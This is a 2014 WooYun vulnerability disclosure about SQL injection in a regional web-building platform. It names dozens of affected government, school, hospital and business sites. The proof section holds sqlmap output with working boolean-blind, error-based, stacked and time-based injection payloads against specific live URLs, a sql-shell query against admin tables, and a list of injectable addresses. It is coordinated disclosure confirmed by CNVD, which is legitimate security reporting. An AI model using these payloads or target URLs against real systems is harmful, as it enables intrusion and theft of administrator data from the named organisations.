当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-074044

漏洞标题:某建站系统存在SQL注入,影响多个政府、企业等网站

相关厂商:科域网络

漏洞作者: 路人甲

提交时间:2014-08-27 18:05

修复时间:2014-11-25 18:06

公开时间:2014-11-25 18:06

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-08-27: 细节已通知厂商并且等待厂商处理中
2014-09-01: 厂商已经确认,细节仅向厂商公开
2014-09-04: 细节向第三方安全合作伙伴开放
2014-10-26: 细节向核心白帽子及相关领域专家公开
2014-11-05: 细节向普通白帽子公开
2014-11-15: 细节向实习白帽子公开
2014-11-25: 细节向公众公开

简要描述:

SQL注入

详细说明:

江门科域网络
主站http://www.iebcc.com/

Snap78.jpg


看其客户

Snap79.jpg


政府事业单位类:

Snap80.jpg


大概27个
由于为Access数据库
这里就不爆表
仅查询admin表数据数量

漏洞证明:

政府事业单位:
江门市新会区住房和城乡建设局在搜索处存在注入
http://www.xhjsj.gov.cn/

Snap73.jpg


在搜索处输入'

Snap74.jpg


Snap75.jpg


构造注入url
http://www.xhjsj.gov.cn/search.asp?keyword=1&BtnFind.x=35&BtnFind.y=14 

sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: GET
Parameter: keyword
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: keyword=1%' AND 3552=3552 AND '%'='&BtnFind.x=35&BtnFind.y=14
---
[11:47:37] [INFO] the back-end DBMS is Microsoft Access
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft Access


[5 tables]
+---------+
| admin   |
| article |
| images  |
| info    |
| video   |
+---------+


admin中有两条数据

Snap81.jpg


在url输入admin跳转到管理员登陆界面

Snap83.jpg


-------
江顺大桥-江门大道
http://www.jmjsdq.com
注入点:http://www.jmjsdq.com/search.asp?keyword=1&imageField.x=0&imageField.y=0

Snap85.jpg


sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: GET
Parameter: keyword
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: keyword=1%' AND 1732=1732 AND '%'='&imageField.x=0&imageField.y=0
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: keyword=1%' AND 9055=CONVERT(INT,(SELECT CHAR(113)+CHAR(113)+CHAR(1
22)+CHAR(119)+CHAR(113)+(SELECT (CASE WHEN (9055=9055) THEN CHAR(49) ELSE CHAR(4
8) END))+CHAR(113)+CHAR(110)+CHAR(113)+CHAR(111)+CHAR(113))) AND '%'='&imageFiel
d.x=0&imageField.y=0
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: keyword=1%'; WAITFOR DELAY '0:0:5'--&imageField.x=0&imageField.y=0
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: keyword=1%' WAITFOR DELAY '0:0:5'--&imageField.x=0&imageField.y=0
---


web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft SQL Server 2005
[12:58:49] [INFO] calling Microsoft SQL Server shell. To quit type 'x' or 'q' an
d press ENTER
sql-shell> select count(*) from admin;
[12:58:59] [INFO] fetching SQL SELECT statement query output: 'select count(*) f
rom admin'
[12:58:59] [INFO] retrieved: 2
select count(*) from admin;:    '2'


-------
江门市物业管理协会
http://www.jmwyxh.org.cn
注入点http://www.jmwyxh.org.cn/show_news.asp?guid=20140805113948583

Snap86.jpg


GET parameter 'guid' is vulnerable. Do you want to keep testing the others (if a
ny)? [y/N] n
sqlmap identified the following injection points with a total of 35 HTTP(s) requ
ests:
---
Place: GET
Parameter: guid
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: guid=20140805113948583' AND 1390=1390 AND 'Nibh'='Nibh
---


Snap84.jpg


-----
五邑大学 纺织服装学院
http://dept.wyu.edu.cn/fangzhi/search.asp?fieldname=title&keyword=0&imageField.x=0&imageField.y=0

Snap87.jpg


sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: GET
Parameter: keyword
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: fieldname=title&keyword=0%' AND 8654=8654 AND '%'='&imageField.x=0&
imageField.y=0
---


Snap88.jpg


------
江门红十字会医院
【入侵痕迹】

Snap89.jpg


-----
江门交通运输工程质量检测站
注入点http://www.jmjtzjz.com/search.asp?fieldname=title&keyword=0&imageField.x=0&imageField.y=0

Snap90.jpg


sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: URI
Parameter: #1*
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: http://www.jmjtzjz.com:80/search.asp?fieldname=title&keyword=0%' AN
D 2971=2971 AND '%'='&imageField.x=0&imageField.y=0
---


Snap91.jpg


-------
杜阮中心初中
注入点:
http://www.drzxcz.com/search.asp?condition=content&keyword=0&x=0&y=0

Snap93.jpg


Snap95.jpg


---
广东省地质局第六地质大队
http://www.gddz6d.com/search.asp?keyword=1&imageField.x=0&imageField.y=0

Snap96.jpg


Snap98.jpg


南海殡仪馆http://www.nhbyg.com/news.asp?url=news.asp&keyword=0%27&BtnOk=%CB%D1%CB%F7
江门市新会区城市综合管理局http://cgj.xinhui.gov.cn/search.asp?fenlei=1&keywords=0%27&submit.x=13&submit.y=16
江门航道局http://www.jmhdw.com/zwgk.asp?linkurl=zwgk.asp&keyword=0%27&imageField.x=0&imageField.y=0
=====================
有很多,这里举几个例子
门户类

江门赛格车圣http://www.jm952100.com/shop.asp?keyword=0%27&imageField.x=0&imageField.y=0
中国台山玉雕-台山玉石http://www.zgtsyd.com/products.asp?keyword=d%27&BtnOk.x=18&BtnOk.y=12
一个手机商城http://www.mfxshop.cn/mobile.asp?keyword=a%27&imageField.x=0&imageField.y=0


企业类

http://www.jmgongcheng.com/search.asp?keyword=a%27&imageField.x=14&imageField.y=13
http://www.ymyg360.com/products.asp?keyword=a&BtnSearch=%B2%FA%C6%B7%CB%D1%CB%F7
http://www.opasm.com.cn/products.asp?keyword=a&imageField.x=4&imageField.y=11


http://www.jmjtzjz.com/search.asp?fieldname=title&keyword=0&imageField.x=0&imageField.y=0

修复方案:

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:17

确认时间:2014-09-01 09:59

厂商回复:

CNVD确认并复现所述情况,已经由CNVD通过电话和邮件向软件生产厂商通报,同时,根据测试案例,已经转由CNCERT下发给广东分中心并通报教育网应急组织处置相关案例。

最新状态:

暂无